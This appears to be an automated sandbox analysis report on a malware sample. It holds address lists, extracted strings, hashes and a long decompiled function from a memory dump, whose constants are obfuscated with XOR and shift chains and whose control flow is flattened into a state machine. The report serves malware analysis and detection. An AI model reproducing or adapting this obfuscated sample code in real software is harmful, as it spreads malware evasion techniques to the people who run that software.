0x00a71c2d
0x00a71c38
0x00a71c40
0x00a71c4b
0x00a71c56
0x00a71c61
0x00a71c6c
0x00a71c74
0x00a71c7c
0x00a71c84
0x00a71c8c
0x00a71c94
0x00a71cac
0x00a71cae
0x00a71cb3
0x00a71cb8
0x00a71cbf
0x00a71cca
0x00a71cd5
0x00a71cdd
0x00a71ce9
0x00a71ced
0x00a71cf5
0x00a71cfd
0x00a71d08
0x00a71d13
0x00a71d1e
0x00a71d26
0x00a71d2e
0x00a71d3e
0x00a71d42
0x00a71d4a
0x00a71d52
0x00a71d57
0x00a71d5f
0x00a71d67
0x00a71d6f
0x00a71d82
0x00a71d83
0x00a71d8a
0x00a71d95
0x00a71da9
0x00a71db0
0x00a71dbb
0x00a71dc6
0x00a71dd1
0x00a71ddc
0x00a71de7
0x00a71df2
0x00a71dfa
0x00a71e02
0x00a71e0d
0x00a71e15
0x00a71e1d
0x00a71e22
0x00a71e2a
0x00a71e32
0x00a71e3d
0x00a71e48
0x00a71e53
0x00a71e5e
0x00a71e66
0x00a71e71
0x00a71e7e
0x00a71e89
0x00a71e94
0x00a71e9f
0x00a71eaa
0x00a71eb5
0x00a71ec0
0x00a71ecb
0x00a71ed6
0x00a71ede
0x00a71ee9
0x00a71ef4
0x00a71eff
0x00a71f06
0x00a71f11
0x00a71f1c
0x00a71f24
0x00a71f2c
0x00a71f37
0x00a71f3f
0x00a71f44
0x00a71f49
0x00a71f51
0x00a71f59
0x00a71f61
0x00a71f66
0x00a71f6e
0x00a71f73
0x00a71f7b
0x00a71f83
0x00a71f8b
0x00a71f93
0x00a71f9b
0x00a71fa3
0x00a71fab
0x00a71fb3
0x00a71fbb
0x00a71fc0
0x00a71fc8
0x00a71fd3
0x00a71fdb
0x00a71fe3
0x00a71fee
0x00a71ff9
0x00a72004
0x00a7200f
0x00a7201a
0x00a72025
0x00a72030
0x00a7203b
0x00a72044
0x00a72049
0x00a72052
0x00a72059
0x00a7205e
0x00a72067
0x00a72072
0x00a7207d
0x00a72090
0x00a72091
0x00a72098
0x00a720a3
0x00a720b6
0x00a720bd
0x00a720c8
0x00a720d3
0x00a720e1
0x00a720ea
0x00a720f7
0x00a720fa
0x00a720fe
0x00a72106
0x00a7210e
0x00a72116
0x00a7211e
0x00a72122
0x00a7212a
0x00a72135
0x00a72148
0x00a7214f
0x00a7215a
0x00a72162
0x00a72167
0x00a7216f
0x00a72177
0x00a7217f
0x00a72187
0x00a72197
0x00a721a0
0x00a721a1
0x00a721a5
0x00a721ad
0x00a721b8
0x00a721c0
0x00a721c8
0x00a721d3
0x00a721de
0x00a721e6
0x00a721f1
0x00a721fc
0x00a72210
0x00a72217
0x00a72222
0x00a7222f
0x00a72233
0x00a7223b
0x00a72240
0x00a72248
0x00a72253
0x00a7225e
0x00a72269
0x00a7227c
0x00a72283
0x00a7228e
0x00a72299
0x00a722a4
0x00a722ac
0x00a722b7
0x00a722c2
0x00a722cd
0x00a722d8
0x00a722e0
0x00a722e5
0x00a722ed
0x00a722f5
0x00a722fd
0x00a72305
0x00a7230d
0x00a72317
0x00a7231b
0x00a72323
0x00a7232e
0x00a72339
0x00a72344
0x00a72354
0x00a72359
0x00a7235f
0x00a72367
0x00a7236f
0x00a72377
0x00a7237f
0x00a72388
0x00a7238b
0x00a7238f
0x00a72397
0x00a7239f
0x00a723a7
0x00a723af
0x00a723b7
0x00a723bc
0x00a723c4
0x00a723cc
0x00a723d1
0x00a723d9
0x00a723e1
0x00a723e9
0x00a723f1
0x00a723fe
0x00a72402
0x00a72407
0x00a7240f
0x00a7241a
0x00a72422
0x00a7242d
0x00a72443
0x00a7244a
0x00a72452
0x00a7245d
0x00a72469
0x00a7246e
0x00a72474
0x00a72479
0x00a7247e
0x00a72486
0x00a72492
0x00a72497
0x00a7249d
0x00a724a5
0x00a724ad
0x00a724b5
0x00a724c0
0x00a724cf
0x00a724d2
0x00a724d9
0x00a724e4
0x00a724ef
0x00a724f7
0x00a72502
0x00a7250d
0x00a72515
0x00a72520
0x00a7252b
0x00a72533
0x00a72544
0x00a72547
0x00a7254e
0x00a72556
0x00a72561
0x00a7256c
0x00a72574
0x00a7257f
0x00a7258c
0x00a72595
0x00a72599
0x00a7259e
0x00a725a6
0x00a725b1
0x00a725bc
0x00a725c7
0x00a725d2
0x00a725e8
0x00a725ef
0x00a725fa
0x00a72605
0x00a72617
0x00a7261c
0x00a72625
0x00a72630
0x00a72638
0x00a72640
0x00a72648
0x00a7264d
0x00a72655
0x00a7265d
0x00a72665
0x00a7266a
0x00a72672
0x00a7267a
0x00a72685
0x00a7268d
0x00a72698
0x00a726aa
0x00a726af
0x00a726b8
0x00a726c3
0x00a726ce
0x00a726e0
0x00a726e3
0x00a726ea
0x00a726f5
0x00a72700
0x00a72708
0x00a72710
0x00a72718
0x00a7271d
0x00a72725
0x00a72730
0x00a7273b
0x00a72746
0x00a72751
0x00a7275c
0x00a72767
0x00a72772
0x00a7277d
0x00a72788
0x00a72793
0x00a7279b
0x00a727a3
0x00a727ae
0x00a727b9
0x00a727c4
0x00a727d3
0x00a727d8
0x00a727df
0x00a727e1
0x00a727e1
0x00a727e1
0x00a727e6
0x00a727e6
0x00a727e6
0x00a727e6
0x00a727ec
0x00000000
0x00000000
0x00a727f2
0x00a72999
0x00a729be
0x00a729c5
0x00a729ca
0x00a729cd
0x00a727e1
0x00a727e1
0x00a727e1
0x00000000
0x00a727e1
0x00a727f8
0x00a727fe
0x00a72928
0x00a72937
0x00a7293d
0x00a72956
0x00a72977
0x00a7297f
0x00a72984
0x00a72987
0x00a72989
0x00a7298f
0x00a727e1
0x00a727e1
0x00a727e1
0x00000000
0x00a727e1
0x00a727e1
0x00a72804
0x00a72806
0x00a7289a
0x00a728e2
0x00a728f6
0x00a728fd
0x00a72902
0x00a72905
0x00a727e1
0x00a727e1
0x00a727e1
0x00000000
0x00a727e1
0x00a7280c
0x00a72812
0x00a72870
0x00a72874
0x00a72879
0x00a7287b
0x00a7287e
0x00a72885
0x00a7288a
0x00000000
0x00a72814
0x00a7281a
0x00000000
0x00a72bfe
0x00a72826
0x00000000
0x00a7282c
0x00a72840
0x00a72844
0x00a72849
0x00a7284c
0x00a727e1
0x00a727e1
0x00a727e1
0x00000000
0x00a727e1
0x00a727e1
0x00a72826
0x00a72812
0x00000000
0x00a72806
0x00a727fe
0x00a72c09
0x00a72c09
0x00000000
0x00a72c09
0x00a729d7
0x00a729dd
0x00a72bb5
0x00a72bbc
0x00a72bc1
0x00a72bc4
0x00a72bc9
0x00000000
0x00a729e3
0x00a729e3
0x00a729e9
0x00a72b6e
0x00a72b7c
0x00a72b81
0x00a72b86
0x00a72b8e
0x00000000
0x00a729ef
0x00a729ef
0x00a729f5
0x00a72b1b
0x00a72b29
0x00a72b2a
0x00a72b2c
0x00a72b33
0x00a72b3a
0x00a72b45
0x00a72b47
0x00a72b49
0x00a72b4e
0x00a72b51
0x00a727e1
0x00a727e1
0x00a727e1
0x00000000
0x00a727e1
0x00a729fb
0x00a729fb
0x00a72a01
0x00000000
0x00a72a07
0x00a72a2b
0x00a72a51
0x00a72a56
0x00a72a62
0x00a72a73
0x00a72a86
0x00a72abd
0x00a72adb
0x00a72ae4
0x00a72b01
0x00a72b06
0x00a72b09
0x00a72b0b
0x00a72b11
0x00a727e1
0x00a727e1
0x00a727e1
0x00000000
0x00a727e1
0x00a727e1
0x00a72b0b
0x00a72a01
0x00a729f5
0x00a729e9
0x00000000
0x00a72bce
0x00a72bce
0x00a72bce
0x00000000
0x00a727e6

Strings

*QD, xrefs: 00A721C8
-Z1, xrefs: 00A72725
P, xrefs: 00A71F59
A$0, xrefs: 00A721A5
$g , xrefs: 00A72072
:Bp!, xrefs: 00A72116
W, xrefs: 00A7225E
EUH, xrefs: 00A7203B
:&, xrefs: 00A722D8
$c, xrefs: 00A72746
"tK, xrefs: 00A72561
1d, xrefs: 00A7238F
XV, xrefs: 00A724E4
E`K, xrefs: 00A71E32
V=9, xrefs: 00A7267A
)wEUH, xrefs: 00A72052

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: "tK$$g $$c$*QD$-Z1$1d$:Bp!$:&$A$0$EUH$E`K$V=9$XV$ )wEUH$P$W
API String ID: 0-3509732160
Opcode ID: 8d5690429627ee7f81146814c1ac070a134bae3437b43a3663d2ff84c90c91cd
Instruction ID: 899e2b851b8bcc451657ad92f826f681bc3b86b1ffe32eec6ca7e929646ea8ed
Opcode Fuzzy Hash: 8d5690429627ee7f81146814c1ac070a134bae3437b43a3663d2ff84c90c91cd
Instruction Fuzzy Hash: 3D72E0715083809BD3B8CF25C98AB8BBBE1FBD4308F108A1DE5D996260D7B59949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00A6996C, Relevance: 19.4, Strings: 15, Instructions: 674
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00A6996C(signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a40) {
				signed int* _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				void* __ecx;
				signed int _t757;
				void* _t765;
				signed int _t769;
				signed int _t775;
				signed int _t786;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				signed int _t798;
				signed int _t799;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				void* _t805;
				signed int _t814;
				intOrPtr* _t823;
				void* _t874;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t895;
				signed int* _t902;
				void* _t904;

				_push(_a40);
				_push(_a36);
				_v4 = __edx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00A68002(_a20 & 0x0000ffff);
				_v264 = 0xc60fd9;
				_v264 = _v264 >> 0xb;
				_t902 =  &(( &_v268)[0xc]);
				_v264 = _v264 ^ 0xb6865c26;
				_v264 = _v264 ^ 0xb68644e7;
				_t786 = 0;
				_v232 = 0x94febf;
				_t893 = 0x15b98a1;
				_v232 = _v232 << 0xd;
				_v232 = _v232 + 0xffff7487;
				_v232 = _v232 ^ 0x8b0095cf;
				_v232 = _v232 ^ 0x14d7c15b;
				_v132 = 0x739728;
				_v132 = _v132 + 0x181a;
				_v132 = _v132 + 0xffff9c9c;
				_v132 = _v132 ^ 0x00734b16;
				_v188 = 0x783031;
				_v188 = _v188 << 5;
				_v12 = 0;
				_t788 = 0x6e;
				_v188 = _v188 * 0x59;
				_v188 = _v188 ^ 0x3918a120;
				_v148 = 0xdd82e;
				_v148 = _v148 | 0xe4e540fc;
				_v148 = _v148 + 0xc534;
				_v148 = _v148 ^ 0xe4eede32;
				_v116 = 0x899f5;
				_v116 = _v116 / _t788;
				_v116 = _v116 + 0x5648;
				_v116 = _v116 ^ 0x00406a4c;
				_v156 = 0x9ca5d6;
				_t789 = 0x1c;
				_t891 = 0x7b;
				_v156 = _v156 * 0x64;
				_v156 = _v156 << 9;
				_v156 = _v156 ^ 0x618b3000;
				_v32 = 0xd5cd6e;
				_v32 = _v32 / _t789;
				_v32 = _v32 ^ 0x0407a2c3;
				_v64 = 0x23343;
				_v64 = _v64 / _t891;
				_v64 = _v64 ^ 0x00080494;
				_v252 = 0xfa5485;
				_v252 = _v252 * 0x42;
				_v252 = _v252 | 0xc32886a6;
				_t790 = 0x50;
				_v252 = _v252 * 0x35;
				_v252 = _v252 ^ 0x8227d546;
				_v224 = 0x2e8bf6;
				_v224 = _v224 | 0xf76545cb;
				_v224 = _v224 / _t790;
				_v224 = _v224 << 6;
				_v224 = _v224 ^ 0xc5f30dc0;
				_v16 = 0x78ee4b;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0x80f1dc96;
				_v208 = 0x791fee;
				_v208 = _v208 >> 8;
				_v208 = _v208 >> 2;
				_v208 = _v208 >> 0xb;
				_v208 = _v208 ^ 0x00000003;
				_v152 = 0xbd5041;
				_t791 = 5;
				_v152 = _v152 / _t791;
				_v152 = _v152 + 0x721a;
				_v152 = _v152 ^ 0x00264eb2;
				_v136 = 0x6c2d31;
				_v136 = _v136 + 0xffff6aee;
				_v136 = _v136 ^ 0x21760cef;
				_v136 = _v136 ^ 0x211d94ef;
				_v120 = 0x6ceb08;
				_v120 = _v120 + 0xffffcbf6;
				_v120 = _v120 ^ 0x9f43d110;
				_v120 = _v120 ^ 0x9f2f67f1;
				_v88 = 0xc74391;
				_v88 = _v88 + 0xffff6c5e;
				_v88 = _v88 ^ 0x00c6afec;
				_v128 = 0x4b3465;
				_v128 = _v128 | 0xcf5ecbdf;
				_v128 = _v128 ^ 0xcf5ffeff;
				_v264 = 0xfd23b8;
				_t792 = 0x4e;
				_v264 = _v264 / _t792;
				_t793 = 0x45;
				_v264 = _v264 / _t793;
				_v264 = _v264 ^ 0x0002f78a;
				_v264 = 0xfa9619;
				_t794 = 0x1e;
				_v264 = _v264 / _t794;
				_v264 = _v264 + 0xffffb0fb;
				_v264 = _v264 ^ 0x000b775c;
				_v264 = 0x807ba4;
				_v264 = _v264 << 4;
				_v264 = _v264 << 0xa;
				_v264 = _v264 ^ 0x1ee80ab8;
				_v264 = 0x9af257;
				_v264 = _v264 << 0xb;
				_v264 = _v264 * 0x56;
				_v264 = _v264 ^ 0x6b422079;
				_v268 = 0x26ec4d;
				_v268 = _v268 << 0xc;
				_v268 = _v268 >> 0xe;
				_v268 = _v268 ^ 0xbf1cc723;
				_v268 = _v268 ^ 0xbf1316e8;
				_v268 = 0x604ef4;
				_v268 = _v268 | 0xbb4d6b52;
				_v268 = _v268 >> 5;
				_t795 = 0x18;
				_v268 = _v268 / _t795;
				_v268 = _v268 ^ 0x003fa9db;
				_v268 = 0xff1eaf;
				_v268 = _v268 << 8;
				_t796 = 0xa;
				_v268 = _v268 * 0x6c;
				_v268 = _v268 >> 0xc;
				_v268 = _v268 ^ 0x000cb5e2;
				_v260 = 0xc7e312;
				_v260 = _v260 | 0x4ced50b1;
				_v260 = _v260 ^ 0x4ce89335;
				_v260 = 0xaa4ecb;
				_v260 = _v260 << 0x10;
				_v260 = _v260 ^ 0x4ec443b3;
				_v264 = 0x38c20f;
				_v264 = _v264 >> 9;
				_v264 = _v264 | 0x7754c32c;
				_v264 = _v264 ^ 0x775a6c62;
				_v268 = 0xc43478;
				_v268 = _v268 * 0x54;
				_v268 = _v268 ^ 0x37dd0540;
				_v268 = _v268 + 0x34a3;
				_v268 = _v268 ^ 0x77bf44fd;
				_v268 = 0x77fa17;
				_v268 = _v268 + 0xffffb1ac;
				_v268 = _v268 * 0x73;
				_v268 = _v268 << 5;
				_v268 = _v268 ^ 0xb8444167;
				_v172 = 0x123f2b;
				_v172 = _v172 ^ 0x6fe657fb;
				_v172 = _v172 + 0x9431;
				_v172 = _v172 ^ 0x6ff55f0d;
				_v240 = 0xf43856;
				_v240 = _v240 + 0xffff5dae;
				_v240 = _v240 + 0xffff503f;
				_v240 = _v240 >> 5;
				_v240 = _v240 ^ 0x000ec78e;
				_v80 = 0x77a9f7;
				_v80 = _v80 << 0xa;
				_v80 = _v80 ^ 0xdeafa158;
				_v248 = 0x33c41a;
				_v248 = _v248 + 0xffffb1d0;
				_v248 = _v248 * 0x66;
				_v248 = _v248 << 9;
				_v248 = _v248 ^ 0x01f08429;
				_v216 = 0x461c40;
				_v216 = _v216 * 0x16;
				_v216 = _v216 >> 0xb;
				_v216 = _v216 / _t796;
				_v216 = _v216 ^ 0x0005571e;
				_v164 = 0x51d98c;
				_v164 = _v164 | 0x3f5455a1;
				_v164 = _v164 * 0x74;
				_v164 = _v164 ^ 0xb2e52dfc;
				_v108 = 0x44745a;
				_t314 =  &_v108; // 0x44745a
				_v108 =  *_t314 * 0x63;
				_v108 = _v108 + 0xffff8cf2;
				_v108 = _v108 ^ 0x1a7ba94f;
				_v40 = 0xed32ff;
				_v40 = _v40 + 0x1ad9;
				_v40 = _v40 ^ 0x00e55aa4;
				_v196 = 0x47b3fb;
				_v196 = _v196 >> 0xe;
				_v196 = _v196 ^ 0xd9c7612f;
				_v196 = _v196 ^ 0xa0a00898;
				_v196 = _v196 ^ 0x7960f230;
				_v180 = 0x538ee1;
				_v180 = _v180 >> 6;
				_v180 = _v180 | 0xecdb2f6f;
				_v180 = _v180 ^ 0xecd76c94;
				_v104 = 0x633234;
				_v104 = _v104 ^ 0xd30b5520;
				_v104 = _v104 | 0xe2e43f1e;
				_v104 = _v104 ^ 0xf3ed65d6;
				_v212 = 0xf9c0f6;
				_v212 = _v212 + 0x2d4a;
				_t797 = 6;
				_v212 = _v212 * 0x4f;
				_v212 = _v212 + 0x46b3;
				_v212 = _v212 ^ 0x4d2b61f6;
				_v100 = 0xc841ec;
				_v100 = _v100 * 0x22;
				_v100 = _v100 ^ 0x1a9d1048;
				_v28 = 0x65babf;
				_v28 = _v28 + 0xffff8486;
				_v28 = _v28 ^ 0x006f3125;
				_v256 = 0xbe5bf2;
				_v256 = _v256 + 0xc39e;
				_v256 = _v256 * 0xc;
				_v256 = _v256 / _t797;
				_v256 = _v256 ^ 0x01787995;
				_v72 = 0xd91fd7;
				_v72 = _v72 + 0x652d;
				_v72 = _v72 ^ 0x00d4f002;
				_v96 = 0xd13a07;
				_t798 = 0x60;
				_v96 = _v96 / _t798;
				_v96 = _v96 ^ 0x000707c2;
				_v20 = 0xffc8b7;
				_v20 = _v20 ^ 0x1e1e598a;
				_v20 = _v20 ^ 0x1ee18fe4;
				_v176 = 0xcdab5;
				_v176 = _v176 ^ 0x9598c7bd;
				_v176 = _v176 + 0xffff92b0;
				_v176 = _v176 ^ 0x959d0362;
				_v184 = 0xa758a4;
				_v184 = _v184 + 0x5903;
				_v184 = _v184 + 0xfffff609;
				_v184 = _v184 ^ 0x00ae750e;
				_v56 = 0xc83e02;
				_v56 = _v56 << 2;
				_v56 = _v56 ^ 0x0323bea3;
				_v76 = 0xad0f66;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x00063244;
				_v84 = 0x39efa1;
				_v84 = _v84 ^ 0xb68855ee;
				_v84 = _v84 ^ 0xb6b61069;
				_v92 = 0xe02175;
				_v92 = _v92 | 0xb2c815a7;
				_v92 = _v92 ^ 0xb2e41d90;
				_v236 = 0x4481b2;
				_v236 = _v236 + 0x743f;
				_v236 = _v236 * 0x2f;
				_v236 = _v236 >> 0xf;
				_v236 = _v236 ^ 0x0006d55a;
				_v160 = 0xb9532c;
				_v160 = _v160 << 5;
				_v160 = _v160 * 0x49;
				_v160 = _v160 ^ 0x9b1801bc;
				_v244 = 0x1281ad;
				_v244 = _v244 + 0xa67d;
				_v244 = _v244 ^ 0x7c1b37b8;
				_v244 = _v244 + 0xffff20cb;
				_v244 = _v244 ^ 0x7c0b9163;
				_v192 = 0x88e24d;
				_v192 = _v192 ^ 0x2ebd1bb6;
				_v192 = _v192 / _t891;
				_v192 = _v192 ^ 0x006b6db3;
				_v68 = 0xd4274f;
				_t799 = 0x2e;
				_v68 = _v68 / _t799;
				_v68 = _v68 ^ 0x00048e69;
				_v144 = 0xb83dd4;
				_v144 = _v144 | 0xb8649d90;
				_v144 = _v144 + 0x9cab;
				_v144 = _v144 ^ 0xb8f32006;
				_v228 = 0x23b3be;
				_v228 = _v228 << 8;
				_v228 = _v228 + 0x2e9b;
				_v228 = _v228 + 0xffff8964;
				_v228 = _v228 ^ 0x23ba9bf9;
				_v264 = 0xe685de;
				_t800 = 0x37;
				_v264 = _v264 * 5;
				_v264 = _v264 << 3;
				_v264 = _v264 ^ 0x240c8630;
				_v44 = 0x14cbda;
				_v44 = _v44 + 0xffff3a4b;
				_v44 = _v44 ^ 0x0010602b;
				_v52 = 0x1a3334;
				_v52 = _v52 ^ 0x068d8d0f;
				_v52 = _v52 ^ 0x06918054;
				_v60 = 0xaf3d51;
				_v60 = _v60 + 0xffff6264;
				_v60 = _v60 ^ 0x00a9df53;
				_v200 = 0x71a8f9;
				_v200 = _v200 + 0x8847;
				_v200 = _v200 ^ 0x82b40171;
				_v200 = _v200 / _t800;
				_v200 = _v200 ^ 0x02617ea6;
				_v204 = 0x911bb9;
				_t801 = 0x35;
				_v204 = _v204 * 0x50;
				_v204 = _v204 + 0xffff59e3;
				_v204 = _v204 / _t801;
				_v204 = _v204 ^ 0x00d8a8d3;
				_v48 = 0x1e2b49;
				_v48 = _v48 + 0xffff0c75;
				_v48 = _v48 ^ 0x001a2795;
				_v168 = 0xc7820c;
				_t802 = 0x39;
				_v168 = _v168 / _t802;
				_v168 = _v168 + 0xffff4704;
				_v168 = _v168 ^ 0x0003986f;
				_v124 = 0x6bd51f;
				_v124 = _v124 << 0xc;
				_v124 = _v124 * 0x75;
				_v124 = _v124 ^ 0x8677d78d;
				_v112 = 0x5ede35;
				_v112 = _v112 << 0xe;
				_v112 = _v112 | 0xed99d87a;
				_v112 = _v112 ^ 0xff9c1971;
				_v140 = 0xd25fe4;
				_v140 = _v140 ^ 0x91b7fe4b;
				_t803 = 0x31;
				_v140 = _v140 * 0x59;
				_v140 = _v140 ^ 0x8c53baba;
				_v24 = 0x69dec7;
				_v24 = _v24 + 0xffff289d;
				_v24 = _v24 ^ 0x0068496e;
				_v268 = 0xfe2e0f;
				_v268 = _v268 + 0x26d8;
				_v268 = _v268 / _t803;
				_t804 = 0x1a;
				_v268 = _v268 / _t804;
				_v268 = _v268 ^ 0x000142e0;
				_v260 = 0xf9e36a;
				_v260 = _v260 | 0x3f41e488;
				_v260 = _v260 ^ 0x3ff084b0;
				_t900 = _v8;
				_t892 = _v8;
				while(1) {
					L1:
					_t757 = _v220;
					_t805 = 0x8b02343;
					while(1) {
						L2:
						_t874 = 0x1521ea4;
						while(1) {
							L3:
							_t904 = _t893 - 0x65b0c22;
							if(_t904 > 0) {
								goto L18;
							}
							L4:
							if(_t904 == 0) {
								E00A67B46(_t757, _v140, _v24);
								_t893 = 0x2386dfb;
								while(1) {
									L1:
									_t757 = _v220;
									_t805 = 0x8b02343;
									goto L2;
								}
							} else {
								if(_t893 == _t874) {
									_t757 = E00A6F984(_v196, _t900, _t805, _t805, _v180, _t805, _v104, _a40, _t805, _v88, _v212, _a20, _v100, _v28);
									_t902 =  &(_t902[0xc]);
									_v220 = _t757;
									__eflags = _t757;
									_t805 = 0x8b02343;
									_t893 =  !=  ? 0x8b02343 : 0x2386dfb;
									goto L2;
								} else {
									if(_t893 == 0x15b98a1) {
										_t893 = 0x9ed2ff1;
										continue;
									} else {
										if(_t893 == 0x2386dfb) {
											E00A67B46(_t900, _v268, _v260);
										} else {
											if(_t893 == 0x4000434) {
												E00A67B46(_t892, _v124, _v112);
												_t893 = 0x65b0c22;
												while(1) {
													L1:
													_t757 = _v220;
													_t805 = 0x8b02343;
													goto L2;
												}
											} else {
												if(_t893 != 0x4250561) {
													L38:
													__eflags = _t893 - 0xc402532;
													if(_t893 != 0xc402532) {
														_t757 = _v220;
														continue;
													}
												} else {
													_t823 = _v4;
													if( *_t823 == 0) {
														_t769 = 0;
														__eflags = 0;
													} else {
														_t769 =  *((intOrPtr*)(_t823 + 4));
													}
													E00A7D4B7(_v200, _t892, _v204, _t823, _t769, _a8, _v48, _v168,  *_t823);
													_t902 =  &(_t902[7]);
													asm("sbb esi, esi");
													_t893 = (_t893 & 0x06f981ef) + 0x4000434;
													while(1) {
														L1:
														_t757 = _v220;
														_t805 = 0x8b02343;
														L2:
														_t874 = 0x1521ea4;
														while(1) {
															L3:
															_t904 = _t893 - 0x65b0c22;
															if(_t904 > 0) {
																goto L18;
															}
															goto L4;
														}
														goto L18;
													}
												}
											}
										}
									}
								}
							}
							L41:
							return _t786;
							L18:
							__eflags = _t893 - _t805;
							if(_t893 == _t805) {
								__eflags =  *_v4;
								if(__eflags == 0) {
									_t759 = _v12;
								} else {
									_push(0xa61178);
									_v12 = E00A80AD3(_v256, _v72, __eflags);
								}
								_t814 = _v16 | _v224 | _v252 | _v64 | _v32 | _v156 | _v116 | _v148 | _v188;
								_t895 = _a36 & 1;
								__eflags = _t895;
								if(_t895 != 0) {
									__eflags = _t814;
								}
								_t892 = E00A7E70C(_t814, 1, _v96, _v20, _t814, _v176, _t814, _v184, _v220, _t814, _v56, _a28, _t759);
								E00A72EED(_v76, _v84, _v92, _v12);
								_t902 =  &(_t902[0xd]);
								__eflags = _t892;
								if(_t892 == 0) {
									_t893 = 0x65b0c22;
									goto L37;
								} else {
									_v36 = 1;
									E00A6D7E2(_t892,  &_v36, 4, _v236, _v152, _v160, _v244, _v192);
									_t902 =  &(_t902[6]);
									__eflags = _t895;
									if(_t895 != 0) {
										E00A75F7D(_v68, _t892,  &_v8, _v136, _v144, _v228,  &_v36);
										_t684 =  &_v36;
										 *_t684 = _v36 | _v128;
										__eflags =  *_t684;
										E00A6D7E2(_t892,  &_v36, _v8, _v264, _v120, _v44, _v52, _v60);
										_t902 =  &(_t902[0xb]);
									}
									_t893 = 0x4250561;
									goto L1;
								}
							} else {
								__eflags = _t893 - 0x93954fc;
								if(_t893 == 0x93954fc) {
									__eflags = E00A75B7C(_t892, _a16);
									_t893 = 0x4000434;
									_t765 = 1;
									_t786 =  !=  ? _t765 : _t786;
									while(1) {
										L1:
										_t757 = _v220;
										_t805 = 0x8b02343;
										goto L2;
									}
								} else {
									__eflags = _t893 - 0x9ed2ff1;
									if(_t893 == 0x9ed2ff1) {
										_t893 = 0xdffbe0d;
										continue;
									} else {
										__eflags = _t893 - 0xaf98623;
										if(__eflags == 0) {
											__eflags = E00A8314A(_t892, _v232, __eflags) - _v132;
											_t893 =  ==  ? 0x93954fc : 0x4000434;
											while(1) {
												L1:
												_t757 = _v220;
												_t805 = 0x8b02343;
												goto L2;
											}
										} else {
											__eflags = _t893 - 0xdffbe0d;
											if(_t893 == 0xdffbe0d) {
												_push(_t805);
												_t775 = E00A702E9(_v172, _v240, _v80, _t805, _t805, _v208, _t805, _v248);
												_t900 = _t775;
												__eflags = _t775;
												_t893 =  !=  ? 0x1521ea4 : 0xc402532;
												E00A6F699(_v216, 0, _v164, _v108, _v40);
												_t902 =  &(_t902[0xa]);
												L37:
												_t874 = 0x1521ea4;
												_t805 = 0x8b02343;
											}
											goto L38;
										}
									}
								}
							}
							goto L41;
						}
					}
				}
			}

0x00a6997d
0x00a69987
0x00a6998e
0x00a69995
0x00a6999c
0x00a699a3
0x00a699aa
0x00a699ab
0x00a699b2
0x00a699b9
0x00a699c0
0x00a699c7
0x00a699c9
0x00a699ce
0x00a699d8
0x00a699dd
0x00a699e0
0x00a699ea
0x00a699f2
0x00a699f4
0x00a699fc
0x00a69a01
0x00a69a06
0x00a69a0e
0x00a69a16
0x00a69a1e
0x00a69a29
0x00a69a34
0x00a69a3f
0x00a69a4a
0x00a69a52
0x00a69a57
0x00a69a65
0x00a69a68
0x00a69a6c
0x00a69a74
0x00a69a7f
0x00a69a8a
0x00a69a95
0x00a69aa0
0x00a69ab6
0x00a69abd
0x00a69ac8
0x00a69ad3
0x00a69ae6
0x00a69ae9
0x00a69aea
0x00a69af1
0x00a69af9
0x00a69b04
0x00a69b1a
0x00a69b21
0x00a69b2c
0x00a69b40
0x00a69b47
0x00a69b52
0x00a69b5f
0x00a69b63
0x00a69b74
0x00a69b77
0x00a69b7b
0x00a69b83
0x00a69b8b
0x00a69b9b
0x00a69b9f
0x00a69ba4
0x00a69bac
0x00a69bb7
0x00a69bbe
0x00a69bc9
0x00a69bd1
0x00a69bd6
0x00a69bdb
0x00a69be0
0x00a69be5
0x00a69bf7
0x00a69bfc
0x00a69c05
0x00a69c10
0x00a69c1b
0x00a69c26
0x00a69c31
0x00a69c3c
0x00a69c47
0x00a69c52
0x00a69c5d
0x00a69c68
0x00a69c73
0x00a69c7e
0x00a69c89
0x00a69c94
0x00a69c9f
0x00a69caa
0x00a69cb5
0x00a69cc1
0x00a69cc6
0x00a69cd0
0x00a69cd5
0x00a69cdb
0x00a69ce3
0x00a69cef
0x00a69cf2
0x00a69cf6
0x00a69cfe
0x00a69d06
0x00a69d0e
0x00a69d13
0x00a69d18
0x00a69d20
0x00a69d28
0x00a69d32
0x00a69d36
0x00a69d3e
0x00a69d46
0x00a69d4b
0x00a69d50
0x00a69d58
0x00a69d60
0x00a69d6a
0x00a69d72
0x00a69d7d
